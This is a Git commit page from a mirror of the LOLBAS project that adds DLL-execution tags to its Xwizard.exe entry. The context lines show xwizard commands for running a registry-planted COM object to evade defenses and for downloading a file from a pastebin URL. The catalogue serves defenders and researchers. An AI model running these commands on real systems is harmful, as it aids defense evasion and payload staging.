public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-30 16:54:00 +01:00
Code Issues Projects Releases Wiki Activity

Update Xwizard.yml Tags

Browse Source 
Added Tags:
Execute: DLL
This commit is contained in:
hegusung 2024-10-13 17:34:23 +02:00 committed by GitHub
parent 9a4b3e2b8e
commit 9c6e7222ce
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 4 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
yml/OSBinaries/Xwizard.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
Usecase: Run a com object created in registry to evade defensive counter measures Usecase: Run a com object created in registry to evade defensive counter measures
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet Usecase: Download file from Internet